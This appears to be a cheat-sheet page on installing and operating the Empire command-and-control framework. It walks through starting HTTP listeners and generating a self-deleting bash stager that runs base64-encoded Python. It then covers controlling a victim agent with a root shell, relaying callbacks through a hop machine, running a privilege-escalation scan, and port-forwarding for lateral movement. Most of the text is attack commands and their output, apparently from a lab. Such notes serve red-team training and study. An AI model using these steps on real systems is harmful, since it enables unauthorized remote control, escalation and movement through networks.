Skip to content

Empire

Installation

Using Empire (CLI)

  1. Pull Empire docker image : docker pull bcsecurity/empire:latest
  2. Run Empire docker (in background) : docker run -it --net=host -d bcsecurity/empire:latest
  3. List dockers running :
$ docker ps
CONTAINER ID   IMAGE    ...
27aaeb4e935a   bcsecurity/empire:latest   ...
  1. Run Empire client on the docker : docker exec -it 27aaeb4e935a ./ps-empire client

Using Empire x Starkiller (GUI)

  1. Download Starkiller AppImage from release.
  2. Pull Empire docker image : docker pull bcsecurity/empire:latest
  3. Run Empire docker : docker run -it --net=host bcsecurity/empire:latest
  4. Login on Starkiller : URL : https://localhost:1337, username : empireadmin, password : password123.

Usage

Empire (CLI)

Offical docs and examples, link.

Setup an HTTP listener :

(Empire) > uselistener http
[...]
(Empire: uselistener/http) > set Name listener1
[*] Set Name to listener1
(Empire: uselistener/http) > set Host 10.50.193.153 # LHOST
[*] Set Host to 10.50.193.153
(Empire: uselistener/http) > set Port 4444 # LPORT
[*] Set Port to 4444
(Empire: uselistener/http) > execute
[+] Listener http successfully started
(Empire: uselistener/http) > back
(Empire) > listeners # List all listeners

Id Name         ...
1  listener1    ...

(Empire: listeners) > kill listener1 # kill <NAME>

Setup a stager :

(Empire) > usestager multi/bash # multi/launcher
[...]
(Empire: usestager/multi/bash) > set Listener listener1
[*] Set Listener to listener1
(Empire: usestager/multi/bash) > execute
#!/bin/bash
echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN...'));" | python3 &
rm -f "$0"
exit
(Empire: usestager/multi/bash) > back
(Empire) >

Interacts with agents :

# "run stager on victim"
[+] New agent PZNAL7NS checked in
[*] Sending agent (stage 2) to PZNAL7NS at 10.200.196.200
(Empire) > agents

ID │ Name      │ IP             │ ...
1  │ PZNAL7NS* │ 10.200.196.200 │ ...
(Empire: agents) > rename PZNAL7NS GITPROD
(Empire: agents) > interact GITPROD
(Empire: GITPROD) > help
[...]
(Empire: GITPROD) > shell
[*] Exit Shell Menu with Ctrl+C
(GITPROD)  > whoami
root
(GITPROD) /root > <CTRL+C>
[!] Type exit to quit
(Empire: agents) > kill GITPROD
[>] Are you sure you want to kill GITPROD? [y/N] y
[*] Kill command sent to agent GITPROD
[*] Removed agent GITPROD from list

Redirect listener (hop listener) :

ATTACKER_MACHINE <- HOP_MACHINE <- VICTIM_MACHINE

(Empire) > uselistener http_hop
[...]
(Empire: uselistener/http_hop) > set Host 10.200.196.200 # HOP_MACHINE listen IP
[*] Set Host to 10.200.196.200
(Empire: uselistener/http_hop) > set Port 15555 # HOP_MACHINE listen PORT
[*] Set Port to 15555
(Empire: uselistener/http_hop) > set RedirectListener listener1 # Listener on ATTACKER_MACHINE
[*] Set RedirectListener to listener1
(Empire: uselistener/http_hop) > execute
[+] Listener http_hop successfully started

# Default OutFolder is /tmp/http_hop/
# If you are using docker you need to copy the folder to your host.
$ sudo docker ps
CONTAINER ID   IMAGE                    ...
31c2211149a1   bcsecurity/empire:latest ...
$ sudo docker cp 31c2211149a1:/tmp/http_hop/ .
$ scp -r http_hop/ user@HOP_MACHINE:/tmp/http_hop/
$ ssh user@HOP_MACHINE
[user@HOP_MACHINE ~] cd /tmp/http_hop/
[user@HOP_MACHINE ~] php -S 0.0.0.0:15555
PHP 7.2.24 Development Server started at Mon Feb  7 12:29:05 2022
Listening on http://0.0.0.0:15555
Document root is /tmp/http_hop
Press Ctrl-C to quit.
# Then, make a new stager for VICTIM_MACHINE and executes it.
[Mon Feb  7 12:44:44 2022] 10.200.81.150:49949 [200]: /admin/get.php
[Mon Feb  7 12:44:45 2022] 10.200.81.150:49950 [200]: /admin/get.php
[Mon Feb  7 12:44:45 2022] 10.200.81.150:49951 [200]: /news.php

# On Empire
[+] New agent U1WEADC3 checked in
[*] Sending agent (stage 2) to U1WEADC3 at 10.200.81.200

Use module :

# privesc module
(Empire: agents) > interact U1WEADC3
(Empire: U1WEADC3) > usemodule powershell/privesc/sherlock
[*] Set Agent to U1WEADC3

[...]
(Empire: usemodule/powershell/privesc/sherlock) > execute
[*] Tasked U1WEADC3 to run Task 1
[*] Task 1 results received
Job started: G4XF7U
[*] Task 1 results received


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
[...]

# portfwd module
# Goal : 10.200.81.150:21000 -> 10.200.81.100:80
(Empire: 4R1BN8FV) > shell
[*] Exit Shell Menu with Ctrl+C
(4R1BN8FV) C:\Users\Administrator\Documents > netsh advfirewall firewall add rule name="portfwd" dir=in action=allow protocol=tcp localport=21000
Ok.
(Empire: agents) > usemodule powershell/lateral_movement/invoke_portfwd
[...]
(Empire: usemodule/powershell/lateral_movement/invoke_portfwd) > set Agent 4R1BN8FV
[*] Set Agent to 4R1BN8FV
(Empire: usemodule/powershell/lateral_movement/invoke_portfwd) > set Lhost 10.200.81.150
[*] Set Lhost to 10.200.81.150
(Empire: usemodule/powershell/lateral_movement/invoke_portfwd) > set Lport 21000
[*] Set Lport to 21000
(Empire: usemodule/powershell/lateral_movement/invoke_portfwd) > set Rhost 10.200.81.100
[*] Set Rhost to 10.200.81.100
(Empire: usemodule/powershell/lateral_movement/invoke_portfwd) > set Rport 80
[*] Set Rport to 80
(Empire: usemodule/powershell/lateral_movement/invoke_portfwd) > execute
[*] Tasked 4R1BN8FV to run Task 7
[*] Task 7 results received
Job started: SM3A6W